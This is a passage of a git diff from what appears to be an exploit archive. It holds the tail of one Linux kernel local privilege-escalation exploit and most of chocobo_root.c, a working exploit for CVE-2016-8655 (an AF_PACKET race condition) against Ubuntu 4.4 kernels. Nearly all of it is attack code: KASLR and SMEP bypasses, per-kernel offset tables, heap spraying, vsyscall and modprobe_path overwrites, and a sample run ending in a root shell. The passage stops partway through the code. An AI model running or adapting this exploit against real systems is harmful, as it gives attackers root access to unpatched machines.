+	if (substr == NULL) {
+		return 0;
+	}
+
+	int start = 0;
+	int end = 0;
+	for (start = 0; substr[start] != '-'; start++);
+	for (end = start; substr[end] != '\n'; end++);
+
+	const char* needle2 = "ffffff";
+	substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
+	if (substr == NULL) {
+		return 0;
+	}
+
+	char* endptr = &substr[16];
+	unsigned long r = strtoul(&substr[0], &endptr, 16);
+
+	r &= 0xfffffffffff00000ul;
+	r -= 0x1000000ul;
+
+	return r;
+}
+
+unsigned long get_kernel_addr_syslog() {
+	unsigned long addr = 0;
+	char* syslog;
+	int size;
+
+	dprintf("[.] trying syslog...\n");
+
+	if (!mmap_syslog(&syslog, &size))
+		return 0;
+
+	if (strcmp("trusty", kernels[kernel].distro) == 0)
+		addr = get_kernel_addr_trusty(syslog, size);
+	if (strcmp("xenial", kernels[kernel].distro) == 0)
+		addr = get_kernel_addr_xenial(syslog, size);
+
+	if (!addr)
+		dprintf("[-] kernel base not found in syslog\n");
+
+	return addr;
+}
+
+// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr_kallsyms() {
+	FILE *f;
+	unsigned long addr = 0;
+	char dummy;
+	char sname[256];
+	char* name = "startup_64";
+	char* path = "/proc/kallsyms";
+
+	dprintf("[.] trying %s...\n", path);
+	f = fopen(path, "r");
+	if (f == NULL) {
+		dprintf("[-] open/read(%s)\n", path);
+		return 0;
+	}
+
+	int ret = 0;
+	while (ret != EOF) {
+		ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+		if (ret == 0) {
+			fscanf(f, "%s\n", sname);
+			continue;
+		}
+		if (!strcmp(name, sname)) {
+			fclose(f);
+			return addr;
+		}
+	}
+
+	fclose(f);
+	dprintf("[-] kernel base not found in %s\n", path);
+	return 0;
+}
+
+// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr_sysmap() {
+	FILE *f;
+	unsigned long addr = 0;
+	char path[512] = "/boot/System.map-";
+	char version[32];
+
+	struct utsname u;
+	u = get_kernel_version();
+	strcat(path, u.release);
+	dprintf("[.] trying %s...\n", path);
+	f = fopen(path, "r");
+	if (f == NULL) {
+		dprintf("[-] open/read(%s)\n", path);
+		return 0;
+	}
+
+	char dummy;
+	char sname[256];
+	char* name = "startup_64";
+	int ret = 0;
+	while (ret != EOF) {
+		ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+		if (ret == 0) {
+			fscanf(f, "%s\n", sname);
+			continue;
+		}
+		if (!strcmp(name, sname)) {
+			fclose(f);
+			return addr;
+		}
+	}
+
+	fclose(f);
+	dprintf("[-] kernel base not found in %s\n", path);
+	return 0;
+}
+
+// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr_mincore() {
+	unsigned char buf[getpagesize()/sizeof(unsigned char)];
+	unsigned long iterations = 20000000;
+	unsigned long addr = 0;
+
+	dprintf("[.] trying mincore info leak...\n");
+	/* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
+	if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE,
+		MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
+		dprintf("[-] mmap()\n");
+		return 0;
+	}
+
+	int i;
+	for (i = 0; i <= iterations; i++) {
+		/* Touch a mishandle with this type mapping */
+		if (mincore((void*)0x86000000, 0x1000000, buf)) {
+			dprintf("[-] mincore()\n");
+			return 0;
+		}
+
+		int n;
+		for (n = 0; n < getpagesize()/sizeof(unsigned char); n++) {
+			addr = *(unsigned long*)(&buf[n]);
+			/* Kernel address space */
+			if (addr > 0xffffffff00000000) {
+				addr &= 0xffffffffff000000ul;
+				if (munmap((void*)0x66000000, 0x20000000000))
+					dprintf("[-] munmap()\n");
+				return addr;
+			}
+		}
+	}
+
+	if (munmap((void*)0x66000000, 0x20000000000))
+		dprintf("[-] munmap()\n");
+
+	dprintf("[-] kernel base not found in mincore info leak\n");
+	return 0;
+}
+
+// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr() {
+	unsigned long addr = 0;
+
+	addr = get_kernel_addr_kallsyms();
+	if (addr) return addr;
+
+	addr = get_kernel_addr_sysmap();
+	if (addr) return addr;
+
+	addr = get_kernel_addr_syslog();
+	if (addr) return addr;
+
+	addr = get_kernel_addr_mincore();
+	if (addr) return addr;
+
+	dprintf("[-] KASLR bypass failed\n");
+	exit(EXIT_FAILURE);
+
+	return 0;
+}
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
+
+static bool write_file(const char* file, const char* what, ...) {
+	char buf[1024];
+	va_list args;
+	va_start(args, what);
+	vsnprintf(buf, sizeof(buf), what, args);
+	va_end(args);
+	buf[sizeof(buf) - 1] = 0;
+	int len = strlen(buf);
+
+	int fd = open(file, O_WRONLY | O_CLOEXEC);
+	if (fd == -1)
+		return false;
+	if (write(fd, buf, len) != len) {
+		close(fd);
+		return false;
+	}
+	close(fd);
+	return true;
+}
+
+void setup_sandbox() {
+	int real_uid = getuid();
+	int real_gid = getgid();
+
+	if (unshare(CLONE_NEWUSER) != 0) {
+		dprintf("[!] unprivileged user namespaces are not available\n");
+		dprintf("[-] unshare(CLONE_NEWUSER)\n");
+		exit(EXIT_FAILURE);
+	}
+	if (unshare(CLONE_NEWNET) != 0) {
+		dprintf("[-] unshare(CLONE_NEWUSER)\n");
+		exit(EXIT_FAILURE);
+	}
+
+	if (!write_file("/proc/self/setgroups", "deny")) {
+		dprintf("[-] write_file(/proc/self/set_groups)\n");
+		exit(EXIT_FAILURE);
+	}
+	if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)) {
+		dprintf("[-] write_file(/proc/self/uid_map)\n");
+		exit(EXIT_FAILURE);
+	}
+	if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
+		dprintf("[-] write_file(/proc/self/gid_map)\n");
+		exit(EXIT_FAILURE);
+	}
+
+	cpu_set_t my_set;
+	CPU_ZERO(&my_set);
+	CPU_SET(0, &my_set);
+	if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
+		dprintf("[-] sched_setaffinity()\n");
+		exit(EXIT_FAILURE);
+	}
+
+	if (system("/sbin/ifconfig lo mtu 1500") != 0) {
+		dprintf("[-] system(/sbin/ifconfig lo mtu 1500)\n");
+		exit(EXIT_FAILURE);
+	}
+	if (system("/sbin/ifconfig lo up") != 0) {
+		dprintf("[-] system(/sbin/ifconfig lo up)\n");
+		exit(EXIT_FAILURE);
+	}
+}
+
+void exec_shell() {
+	int fd;
+
+	fd = open("/proc/1/ns/net", O_RDONLY);
+	if (fd == -1) {
+		dprintf("error opening /proc/1/ns/net\n");
+		exit(EXIT_FAILURE);
+	}
+
+	if (setns(fd, CLONE_NEWNET) == -1) {
+		dprintf("error calling setns\n");
+		exit(EXIT_FAILURE);
+	}
+
+	system(SHELL);
+}
+
+bool is_root() {
+	// We can't simple check uid, since we're running inside a namespace
+	// with uid set to 0. Try opening /etc/shadow instead.
+	int fd = open("/etc/shadow", O_RDONLY);
+	if (fd == -1)
+		return false;
+	close(fd);
+	return true;
+}
+
+void check_root() {
+	dprintf("[.] checking if we got root\n");
+	if (!is_root()) {
+		dprintf("[-] something went wrong =(\n");
+		return;
+	}
+	dprintf("[+] got r00t ^_^\n");
+	exec_shell();
+}
+
+int main(int argc, char** argv) {
+	if (argc > 1) SHELL = argv[1];
+
+	dprintf("[.] starting\n");
+
+	dprintf("[.] checking kernel version\n");
+	detect_kernel();
+	dprintf("[~] done, version looks good\n");
+
+	dprintf("[.] checking SMEP and SMAP\n");
+	check_smep_smap();
+	dprintf("[~] done, looks good\n");
+
+	dprintf("[.] setting up namespace sandbox\n");
+	setup_sandbox();
+	dprintf("[~] done, namespace sandbox set up\n");
+
+#if ENABLE_KASLR_BYPASS
+	dprintf("[.] KASLR bypass enabled, getting kernel addr\n");
+	KERNEL_BASE = get_kernel_addr();
+	dprintf("[~] done, kernel addr:   %lx\n", KERNEL_BASE);
+#endif
+
+	dprintf("[.] commit_creds:        %lx\n", COMMIT_CREDS);
+	dprintf("[.] prepare_kernel_cred: %lx\n", PREPARE_KERNEL_CRED);
+
+	unsigned long payload = (unsigned long)&get_root;
+
+#if ENABLE_SMEP_BYPASS
+	dprintf("[.] SMEP bypass enabled, mmapping fake stack\n");
+	mmap_stack();
+	payload = XCHG_EAX_ESP_RET;
+	dprintf("[~] done, fake stack mmapped\n");
+#endif
+
+	dprintf("[.] executing payload %lx\n", payload);
+	oob_execute(payload);
+	dprintf("[~] done, should be root now\n");
+
+	check_root();
+
+	return 0;
+}
\ No newline at end of file
diff --git a/exploits/linux/local/47170.c b/exploits/linux/local/47170.c
new file mode 100644
index 000000000..c81d1d82c
--- /dev/null
+++ b/exploits/linux/local/47170.c
@@ -0,0 +1,945 @@
+/*
+chocobo_root.c
+linux AF_PACKET race condition exploit for CVE-2016-8655.
+Includes KASLR and SMEP/SMAP bypasses.
+For Ubuntu 14.04 / 16.04 (x86_64) kernels 4.4.0 before 4.4.0-53.74.
+All kernel offsets have been tested on Ubuntu / Linux Mint.
+
+vroom vroom
+*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
+user@ubuntu:~$ uname -a
+Linux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
+user@ubuntu:~$ id
+uid=1000(user) gid=1000(user) groups=1000(user)
+user@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread
+user@ubuntu:~$ ./chocobo_root
+linux AF_PACKET race condition exploit by rebel
+kernel version: 4.4.0-51-generic #72
+proc_dostring = 0xffffffff81088090
+modprobe_path = 0xffffffff81e48f80
+register_sysctl_table = 0xffffffff812879a0
+set_memory_rw = 0xffffffff8106f320
+exploit starting
+making vsyscall page writable..
+
+new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
+sockets allocated
+removing barrier and spraying..
+version switcher stopping, x = -1 (y = 174222, last val = 2)
+current packet version = 0
+pbd->hdr.bh1.offset_to_first_pkt = 48
+*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
+please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
+closing socket and verifying.......
+vsyscall page altered!
+
+
+stage 1 completed
+registering new sysctl..
+
+new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
+sockets allocated
+removing barrier and spraying..
+version switcher stopping, x = -1 (y = 30773, last val = 0)
+current packet version = 2
+pbd->hdr.bh1.offset_to_first_pkt = 48
+race not won
+
+retrying stage..
+new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
+sockets allocated
+removing barrier and spraying..
+version switcher stopping, x = -1 (y = 133577, last val = 2)
+current packet version = 0
+pbd->hdr.bh1.offset_to_first_pkt = 48
+*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
+please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
+closing socket and verifying.......
+sysctl added!
+
+stage 2 completed
+binary executed by kernel, launching rootshell
+root@ubuntu:~# id
+uid=0(root) gid=0(root) groups=0(root),1000(user)
+
+*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
+
+Shoutouts to:
+jsc for inspiration (https://www.youtube.com/watch?v=x4UDIfcYMKI)
+mcdelivery for delivering hotcakes and coffee
+
+11/2016
+by rebel
+---
+Updated by <bcoles@gmail.com>
+- check number of CPU cores
+- KASLR bypasses
+- additional kernel targets
+https://github.com/bcoles/kernel-exploits/tree/master/CVE-2016-8655
+*/
+
+#define _GNU_SOURCE
+
+#include <fcntl.h>
+#include <poll.h>
+#include <pthread.h>
+#include <sched.h>
+#include <signal.h>
+#include <stdbool.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+#include <sys/klog.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/sysinfo.h>
+#include <sys/utsname.h>
+#include <sys/wait.h>
+
+#include <arpa/inet.h>
+#include <linux/if_packet.h>
+#include <linux/sched.h>
+#include <netinet/tcp.h>
+#include <netinet/if_ether.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#  define dprintf printf
+#else
+#  define dprintf
+#endif
+
+#define ENABLE_KASLR_BYPASS 1
+
+// Will be overwritten if ENABLE_KASLR_BYPASS
+unsigned long KERNEL_BASE = 0xffffffff81000000ul;
+
+// Will be overwritten by detect_versions()
+int kernel = -1;
+
+// New sysctl path
+const char *SYSCTL_NAME = "hack";
+const char *SYSCTL_PATH = "/proc/sys/hack";
+
+volatile int barrier = 1;
+volatile int vers_switcher_done = 0;
+
+struct kernel_info {
+    char *kernel_version;
+    unsigned long proc_dostring;
+    unsigned long modprobe_path;
+    unsigned long register_sysctl_table;
+    unsigned long set_memory_rw;
+};
+
+struct kernel_info kernels[] = {
+    { "4.4.0-21-generic #37~14.04.1-Ubuntu", 0x084220, 0xc4b000, 0x273a30, 0x06b9d0 },
+    { "4.4.0-22-generic #40~14.04.1-Ubuntu", 0x084250, 0xc4b080, 0x273de0, 0x06b9d0 },
+    { "4.4.0-24-generic #43~14.04.1-Ubuntu", 0x084120, 0xc4b080, 0x2736f0, 0x06b880 },
+    { "4.4.0-28-generic #47~14.04.1-Ubuntu", 0x084160, 0xc4b100, 0x273b70, 0x06b880 },
+    { "4.4.0-31-generic #50~14.04.1-Ubuntu", 0x084160, 0xc4b100, 0x273c20, 0x06b880 },
+    { "4.4.0-34-generic #53~14.04.1-Ubuntu", 0x084160, 0xc4b100, 0x273c40, 0x06b880 },
+    { "4.4.0-36-generic #55~14.04.1-Ubuntu", 0x084160, 0xc4b100, 0x273c60, 0x06b890 },
+    { "4.4.0-38-generic #57~14.04.1-Ubuntu", 0x084210, 0xe4b100, 0x2742e0, 0x06b890 },
+    { "4.4.0-42-generic #62~14.04.1-Ubuntu", 0x084260, 0xe4b100, 0x274300, 0x06b880 },
+    { "4.4.0-45-generic #66~14.04.1-Ubuntu", 0x084260, 0xe4b100, 0x274340, 0x06b880 },
+    //{"4.4.0-46-generic #67~14.04.1-Ubuntu",0x0842f0,0xe4b100,0x274580,0x06b880},
+    { "4.4.0-47-generic #68~14.04.1-Ubuntu", 0x0842f0, 0xe4b100, 0x274580, 0x06b880 },
+    //{"4.4.0-49-generic #70~14.04.1-Ubuntu",0x084350,0xe4b100,0x274b10,0x06b880},
+    { "4.4.0-51-generic #72~14.04.1-Ubuntu", 0x084350, 0xe4b100, 0x274750, 0x06b880 },
+
+    { "4.4.0-21-generic #37-Ubuntu", 0x087cf0, 0xe48e80, 0x286310, 0x06f370 },
+    { "4.4.0-22-generic #40-Ubuntu", 0x087d40, 0xe48f00, 0x2864d0, 0x06f370 },
+    { "4.4.0-24-generic #43-Ubuntu", 0x087e60, 0xe48f00, 0x2868f0, 0x06f370 },
+    { "4.4.0-28-generic #47-Ubuntu", 0x087ea0, 0xe48f80, 0x286df0, 0x06f370 },
+    { "4.4.0-31-generic #50-Ubuntu", 0x087ea0, 0xe48f80, 0x286e90, 0x06f370 },
+    { "4.4.0-34-generic #53-Ubuntu", 0x087ea0, 0xe48f80, 0x286ed0, 0x06f370 },
+    { "4.4.0-36-generic #55-Ubuntu", 0x087ea0, 0xe48f80, 0x286e50, 0x06f360 },
+    { "4.4.0-38-generic #57-Ubuntu", 0x087f70, 0xe48f80, 0x287470, 0x06f360 },
+    { "4.4.0-42-generic #62-Ubuntu", 0x087fc0, 0xe48f80, 0x2874a0, 0x06f320 },
+    { "4.4.0-43-generic #63-Ubuntu", 0x087fc0, 0xe48f80, 0x2874b0, 0x06f320 },
+    { "4.4.0-45-generic #66-Ubuntu", 0x087fc0, 0xe48f80, 0x2874c0, 0x06f320 },
+    //{"4.4.0-46-generic #67-Ubuntu",0x088040,0xe48f80,0x287800,0x06f320},
+    { "4.4.0-47-generic #68-Ubuntu", 0x088040, 0xe48f80, 0x287800, 0x06f320 },
+    //{"4.4.0-49-generic #70-Ubuntu",0x088090,0xe48f80,0x287d40,0x06f320},
+    { "4.4.0-51-generic #72-Ubuntu", 0x088090, 0xe48f80, 0x2879a0, 0x06f320},
+};
+
+#define VSYSCALL              0xffffffffff600000
+#define PROC_DOSTRING         (KERNEL_BASE + kernels[kernel].proc_dostring)
+#define MODPROBE_PATH         (KERNEL_BASE + kernels[kernel].modprobe_path)
+#define REGISTER_SYSCTL_TABLE (KERNEL_BASE + kernels[kernel].register_sysctl_table)
+#define SET_MEMORY_RW         (KERNEL_BASE + kernels[kernel].set_memory_rw)
+
+#define KMALLOC_PAD 64
+
+int pad_fds[KMALLOC_PAD];
+
+// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *
+
+struct ctl_table {
+    const char *procname;
+    void *data;
+    int maxlen;
+    unsigned short mode;
+    struct ctl_table *child;
+    void *proc_handler;
+    void *poll;
+    void *extra1;
+    void *extra2;
+};
+
+#define CONF_RING_FRAMES 1
+
+struct tpacket_req3 tp;
+int sfd;
+int mapped = 0;
+
+struct timer_list {
+    void *next;
+    void *prev;
+    unsigned long           expires;
+    void                    (*function)(unsigned long);
+    unsigned long           data;
+    unsigned int            flags;
+    int                     slack;
+};
+
+// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *
+
+void *setsockopt_thread(void *arg)
+{
+    while (barrier) {}
+    setsockopt(sfd, SOL_PACKET, PACKET_RX_RING, (void*) &tp, sizeof(tp));
+
+    return NULL;
+}
+
+void *vers_switcher(void *arg)
+{
+    int val,x,y;
+
+    while (barrier) {}
+
+    while (1) {
+        val = TPACKET_V1;
+        x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));
+
+        y++;
+
+        if (x != 0) break;
+
+        val = TPACKET_V3;
+        x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));
+
+        if (x != 0) break;
+
+        y++;
+    }
+
+    dprintf("[.] version switcher stopping, x = %d (y = %d, last val = %d)\n",x,y,val);
+    vers_switcher_done = 1;
+
+    return NULL;
+}
+
+// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *
+
+#define BUFSIZE 1408
+char exploitbuf[BUFSIZE];
+
+void kmalloc(void)
+{
+    while(1)
+        syscall(__NR_add_key, "user", "wtf", exploitbuf, BUFSIZE - 24, -2);
+}
+
+void pad_kmalloc(void)
+{
+    int x;
+    for (x = 0; x < KMALLOC_PAD; x++)
+        if (socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)) == -1) {
+            dprintf("[-] pad_kmalloc() socket error\n");
+            exit(EXIT_FAILURE);
+        }
+}
+
+// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
+
+int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
+{
+    pthread_t setsockopt_thread_thread,a;
+    int val;
+    socklen_t l;
+    struct timer_list *timer;
+    int fd;
+    struct tpacket_block_desc *pbd;
+    int off;
+    sigset_t set;
+
+    sigemptyset(&set);
+
+    sigaddset(&set, SIGSEGV);
+
+    if (pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) {
+        dprintf("[-] couldn't set sigmask\n");
+        exit(1);
+    }
+
+    dprintf("[.] new exploit attempt starting, jumping to %p, arg=%p\n", (void *)func, (void *)arg);
+
+    pad_kmalloc();
+
+    fd = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
+
+    if (fd == -1) {
+        dprintf("[-] target socket error\n");
+        exit(1);
+    }
+
+    pad_kmalloc();
+
+    dprintf("[.] done, sockets allocated\n");
+
+    val = TPACKET_V3;
+
+    setsockopt(fd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));
+
+    tp.tp_block_size = CONF_RING_FRAMES * getpagesize();
+    tp.tp_block_nr = 1;
+    tp.tp_frame_size = getpagesize();
+    tp.tp_frame_nr = CONF_RING_FRAMES;
+
+    // try to set the timeout to 10 seconds
+    // the default timeout might still be used though depending on when the race was won
+    tp.tp_retire_blk_tov = 10000;
+
+    sfd = fd;
+
+    if (pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) {
+        dprintf("[-] Error creating thread\n");
+        return 1;
+    }
+
+    pthread_create(&a, NULL, vers_switcher, (void *)NULL);
+
+    usleep(200000);
+
+    dprintf("[.] removing barrier and spraying...\n");
+
+    memset(exploitbuf, '\x00', BUFSIZE);
+
+    timer = (struct timer_list *)(exploitbuf+(0x6c*8)+6-8);
+    timer->next = 0;
+    timer->prev = 0;
+
+    timer->expires = 4294943360;
+    timer->function = (void *)func;
+    timer->data = arg;
+    timer->flags = 1;
+    timer->slack = -1;
+
+    barrier = 0;
+
+    usleep(100000);
+
+    while (!vers_switcher_done) usleep(100000);
+
+    l = sizeof(val);
+    getsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, &l);
+
+    dprintf("[.] current packet version = %d\n",val);
+
+    pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0);
+
+    if (pbd == MAP_FAILED) {
+        dprintf("[-] could not map pbd\n");
+        exit(1);
+    } else {
+        off = pbd->hdr.bh1.offset_to_first_pkt;
+        dprintf("[.] pbd->hdr.bh1.offset_to_first_pkt = %d\n", off);
+    }
+
+
+    if (val == TPACKET_V1 && off != 0) {
+        dprintf("*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\n");
+    } else {
+        dprintf("[-] race not won\n");
+        exit(2);
+    }
+
+    munmap(pbd, tp.tp_block_size * tp.tp_block_nr);
+
+    pthread_create(&a, NULL, verification_func, (void *)NULL);
+
+    dprintf("\n");
+    dprintf("[!] please wait up to a few minutes for timer to be executed.\n");
+    dprintf("[!] if you ctrl-c now the kernel will hang. so don't do that.\n");
+    dprintf("\n");
+
+    sleep(1);
+    dprintf("[.] closing socket and verifying...\n");
+
+    close(sfd);
+
+    kmalloc();
+
+    dprintf("[.] all messages sent\n");
+
+    sleep(31337);
+    exit(1);
+}
+
+int verification_result = 0;
+
+void catch_sigsegv(int sig)
+{
+    verification_result = 0;
+    pthread_exit((void *)1);
+}
+
+void *modify_vsyscall(void *arg)
+{
+    unsigned long *vsyscall = (unsigned long *)(VSYSCALL+0x850);
+    unsigned long x = (unsigned long)arg;
+
+    sigset_t set;
+    sigemptyset(&set);
+    sigaddset(&set, SIGSEGV);
+
+    if (pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) {
+        dprintf("[-] couldn't set sigmask\n");
+        exit(EXIT_FAILURE);
+    }
+
+    signal(SIGSEGV, catch_sigsegv);
+
+    *vsyscall = 0xdeadbeef+x;
+
+    if (*vsyscall == 0xdeadbeef+x) {
+        dprintf("[~] vsyscall page altered!\n");
+        verification_result = 1;
+        pthread_exit(0);
+    }
+
+    return NULL;
+}
+
+void verify_stage1(void)
+{
+    pthread_t v_thread;
+
+    sleep(5);
+
+    int x;
+    for(x = 0; x < 300; x++) {
+
+        pthread_create(&v_thread, NULL, modify_vsyscall, 0);
+
+        pthread_join(v_thread, NULL);
+
+        if(verification_result == 1) {
+            exit(0);
+        }
+
+        write(2,".",1);
+        sleep(1);
+    }
+
+    dprintf("[-] could not modify vsyscall\n");
+    exit(EXIT_FAILURE);
+}
+
+void verify_stage2(void)
+{
+    struct stat b;
+
+    sleep(5);
+
+    int x;
+    for(x = 0; x < 300; x++) {
+
+        if (stat(SYSCTL_PATH, &b) == 0) {
+            dprintf("[~] sysctl added!\n");
+            exit(0);
+        }
+
+        write(2,".",1);
+        sleep(1);
+    }
+
+    dprintf("[-] could not add sysctl\n");
+    exit(EXIT_FAILURE);
+}
+
+void exploit(unsigned long func, unsigned long arg, void *verification_func)
+{
+    int status;
+    int pid;
+
+retry:
+
+    pid = fork();
+
+    if (pid == 0) {
+        try_exploit(func, arg, verification_func);
+        exit(1);
+    }
+
+    wait(&status);
+
+    dprintf("\n");
+
+    if (WEXITSTATUS(status) == 2) {
+        dprintf("[.] retrying stage...\n");
+        kill(pid, 9);
+        sleep(2);
+        goto retry;
+    }
+
+    if (WEXITSTATUS(status) != 0) {
+        dprintf("[-] something bad happened, aborting exploit attempt\n");
+        exit(EXIT_FAILURE);
+    }
+
+    kill(pid, 9);
+}
+
+
+void wrapper(void)
+{
+    struct ctl_table *c;
+
+    dprintf("[.] making vsyscall page writable...\n\n");
+
+    exploit(SET_MEMORY_RW, VSYSCALL, verify_stage1);
+
+    dprintf("[~] done, stage 1 completed\n");
+
+    sleep(5);
+
+    dprintf("[.] registering new sysctl...\n\n");
+
+    c = (struct ctl_table *)(VSYSCALL+0x850);
+
+    memset((char *)(VSYSCALL+0x850), '\x00', 1952);
+
+    strcpy((char *)(VSYSCALL+0xf00), SYSCTL_NAME);
+    memcpy((char *)(VSYSCALL+0xe00), "\x01\x00\x00\x00",4);
+    c->procname = (char *)(VSYSCALL+0xf00);
+    c->mode = 0666;
+    c->proc_handler = (void *)(PROC_DOSTRING);
+    c->data = (void *)(MODPROBE_PATH);
+    c->maxlen = 256;
+    c->extra1 = (void *)(VSYSCALL+0xe00);
+    c->extra2 = (void *)(VSYSCALL+0xd00);
+
+    exploit(REGISTER_SYSCTL_TABLE, VSYSCALL+0x850, verify_stage2);
+
+    dprintf("[~] done, stage 2 completed\n");
+}
+
+// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *
+
+void check_procs() {
+    int min_procs = 2;
+
+    int nprocs = 0;
+    nprocs = get_nprocs_conf();
+
+    if (nprocs < min_procs) {
+        dprintf("[-] system has less than %d processor cores\n", min_procs);
+        exit(EXIT_FAILURE);
+    }
+
+    dprintf("[.] system has %d processor cores\n", nprocs);
+}
+
+struct utsname get_kernel_version() {
+    struct utsname u;
+    int rv = uname(&u);
+    if (rv != 0) {
+        dprintf("[-] uname())\n");
+        exit(EXIT_FAILURE);
+    }
+    return u;
+}
+
+#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
+
+void detect_versions() {
+    struct utsname u;
+    char kernel_version[512];
+
+    u = get_kernel_version();
+
+    if (strstr(u.machine, "64") == NULL) {
+        dprintf("[-] system is not using a 64-bit kernel\n");
+        exit(EXIT_FAILURE);
+    }
+
+    if (strstr(u.version, "-Ubuntu") == NULL) {
+        dprintf("[-] system is not using an Ubuntu kernel\n");
+        exit(EXIT_FAILURE);
+    }
+
+    char *u_ver = strtok(u.version, " ");
+    snprintf(kernel_version, 512, "%s %s", u.release, u_ver);
+
+    int i;
+    for (i = 0; i < ARRAY_SIZE(kernels); i++) {
+        if (strcmp(kernel_version, kernels[i].kernel_version) == 0) {
+            dprintf("[.] kernel version '%s' detected\n", kernels[i].kernel_version);
+            kernel = i;
+            return;
+        }
+    }
+
+    dprintf("[-] kernel version not recognized\n");
+    exit(EXIT_FAILURE);
+}
+
+// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
+
+#define SYSLOG_ACTION_READ_ALL 3
+#define SYSLOG_ACTION_SIZE_BUFFER 10
+
+bool mmap_syslog(char** buffer, int* size) {
+    *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
+    if (*size == -1) {
+        dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\n");
+        return false;
+    }
+
+    *size = (*size / getpagesize() + 1) * getpagesize();
+    *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE,
+                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+
+    *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
+    if (*size == -1) {
+        dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL)\n");
+        return false;
+    }
+
+    return true;
+}
+
+unsigned long get_kernel_addr_trusty(char* buffer, int size) {
+    const char* needle1 = "Freeing unused";
+    char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
+    if (substr == NULL) return 0;
+
+    int start = 0;
+    int end = 0;
+    for (end = start; substr[end] != '-'; end++);
+
+    const char* needle2 = "ffffff";
+    substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
+    if (substr == NULL) return 0;
+
+    char* endptr = &substr[16];
+    unsigned long r = strtoul(&substr[0], &endptr, 16);
+
+    r &= 0xffffffffff000000ul;
+
+    return r;
+}
+
+unsigned long get_kernel_addr_xenial(char* buffer, int size) {
+    const char* needle1 = "Freeing unused";
+    char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
+    if (substr == NULL) {
+        return 0;
+    }
+
+    int start = 0;
+    int end = 0;
+    for (start = 0; substr[start] != '-'; start++);
+    for (end = start; substr[end] != '\n'; end++);
+
+    const char* needle2 = "ffffff";
+    substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
+    if (substr == NULL) {
+        return 0;
+    }
+
+    char* endptr = &substr[16];
+    unsigned long r = strtoul(&substr[0], &endptr, 16);
+
+    r &= 0xfffffffffff00000ul;
+    r -= 0x1000000ul;
+
+    return r;
+}
+
+unsigned long get_kernel_addr_syslog() {
+    unsigned long addr = 0;
+    char* syslog;
+    int size;
+
+    dprintf("[.] trying syslog...\n");
+
+    if (!mmap_syslog(&syslog, &size))
+        return 0;
+
